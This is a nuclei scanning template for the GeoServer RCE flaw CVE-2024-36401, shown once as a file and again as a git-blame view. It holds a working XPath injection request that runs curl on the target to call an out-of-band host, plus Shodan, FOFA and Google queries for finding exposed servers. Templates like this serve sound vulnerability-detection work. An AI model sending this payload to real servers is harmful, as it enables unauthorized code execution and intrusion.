nuclei-templates/http/cves/2024/CVE-2024-36401.yaml

id: CVE-2024-36401

info:
  name: GeoServer RCE in Evaluating Property Name Expressions
  author: DhiyaneshDk,ryanborum
  severity: critical
  description: |
    In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
  impact: |
    This vulnerability can lead to executing arbitrary code.
  reference:
    - https://x.com/sirifu4k1/status/1808270303275241607
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36401
    - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
    - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv
  metadata:
    verified: true
    max-request: 1
    vendor: osgeo
    product: geoserver
    shodan-query: "Server: GeoHttpServer"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
    google-query: intitle:"geoserver"
  tags: cve,cve2024,geoserver,rce,unauth,kev

flow: |
   if(http(1))
   {
   set("name",template.typename[0])
   http(2)
   }

http:
  - raw:
      - |
        GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    extractors:
      - type: regex
        name: typename
        part: body
        group: 1
        regex:
          - typeName=([^&\]]+)
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: content_type
        words:
          - "application/xml"
# digest: 4a0a00473045022050a925671a91913f98317b73a4f3cda362d8a355507459097e4288b9a30eb0b8022100ce59a57d605ac794ee5929feec3cb4238e33483384b7735a20fdce903db76366:922c64590222798bb761d5b6d8e72950
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`id: CVE-2024-36401`

			`info:`
final update 2024-07-03 18:39:15 +00:00			`name: GeoServer RCE in Evaluating Property Name Expressions`
add author name 2024-07-16 12:16:41 +00:00			`author: DhiyaneshDk,ryanborum`
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`severity: critical`
			`description: \|`
			`In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.`
Update CVE-2024-36401.yaml 2024-07-04 08:32:33 +00:00			`impact: \|`
			`This vulnerability can lead to executing arbitrary code.`
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`reference:`
			`- https://x.com/sirifu4k1/status/1808270303275241607`
			`- https://nvd.nist.gov/vuln/detail/CVE-2024-36401`
final update 2024-07-03 18:39:15 +00:00			`- https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401`
			`- https://github.com/advisories/GHSA-6jj6-gm7p-fcvv`
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
			`vendor: osgeo`
			`product: geoserver`
fix-lint 2024-07-16 12:12:48 +00:00			`shodan-query: "Server: GeoHttpServer"`
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`fofa-query:`
			`- title="geoserver"`
final update 2024-07-03 18:39:15 +00:00			`- app="geoserver"`
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`google-query: intitle:"geoserver"`
Added kev tag 2024-07-16 03:24:48 +00:00			`tags: cve,cve2024,geoserver,rce,unauth,kev`
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00
final update 2024-07-03 18:39:15 +00:00			`flow: \|`
			`if(http(1))`
			`{`
			`set("name",template.typename[0])`
			`http(2)`
			`}`

Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`http:`
final update 2024-07-03 18:39:15 +00:00			`- raw:`
			`- \|`
			`GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1`
			`Host: {{Hostname}}`

			`host-redirects: true`
			`extractors:`
			`- type: regex`
			`name: typename`
			`part: body`
			`group: 1`
			`regex:`
			`- typeName=([^&\]]+)`
			`internal: true`

Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`- raw:`
			`- \|`
			`@timeout 20s`
final update 2024-07-03 18:39:15 +00:00			`GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1`
Create CVE-2024-36401.yaml 2024-07-03 08:46:01 +00:00			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`

			`- type: word`
			`part: content_type`
			`words:`
			`- "application/xml"`
Auto Template Signing [Tue Jul 16 12:37:33 UTC 2024] :robot: 2024-07-16 12:37:33 +00:00			`# digest: 4a0a00473045022050a925671a91913f98317b73a4f3cda362d8a355507459097e4288b9a30eb0b8022100ce59a57d605ac794ee5929feec3cb4238e33483384b7735a20fdce903db76366:922c64590222798bb761d5b6d8e72950`